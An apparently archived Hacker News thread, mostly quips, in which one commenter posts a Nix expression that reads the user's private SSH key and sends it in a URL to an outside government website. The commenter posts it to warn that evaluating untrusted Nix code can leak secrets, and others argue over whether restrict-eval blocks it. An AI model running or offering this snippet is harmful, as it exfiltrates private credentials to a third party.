zlacker

[parent] [thread] 6 comments
1. johnbe+(OP)[view] [source] 2024-05-15 00:14:43
When you take a shot at the king, you better not miss.
replies(3): >>karma_+gm >>tjpnz+wo >>beeboo+981
2. karma_+gm[view] [source] 2024-05-15 04:10:18
>>johnbe+(OP)
Or, in this case, when you take a shot at Machiavelli.
replies(1): >>CyberS+hT4
3. tjpnz+wo[view] [source] 2024-05-15 04:37:57
>>johnbe+(OP)
Lest you find yourself in a private jet careening into the ground.
4. beeboo+981[view] [source] 2024-05-15 12:24:20
>>johnbe+(OP)
When you take a shot at the king, you get reported to the police and go to jail.
◧◩
5. CyberS+hT4[view] [source] [discussion] 2024-05-16 16:46:07
>>karma_+gm
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at >>40208937 , but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work.

Hope this helps.

replies(1): >>karma_+zp9
◧◩◪
6. karma_+zp9[view] [source] [discussion] 2024-05-18 10:25:07
>>CyberS+hT4
How is that supposed to "delete my home directory"?

Also, it doesn't work:

    error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Hope this helps.

I don't think it did. I'm not sure what it was supposed to help with.

replies(1): >>CyberS+7Qj
◧◩◪◨
7. CyberS+7Qj[view] [source] [discussion] 2024-05-22 06:26:04
>>karma_+zp9
> How is that supposed to "delete my home directory"?

Ah, I over-quoted that part. My mistake.

> Also, it doesn't work:

It will work with the default Nix settings.

> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

One would need to first turn it on to be able to turn it off.

> https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Indeed, note the default value.

> I don't think it did. I'm not sure what it was supposed to help with.

I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.

[go to top]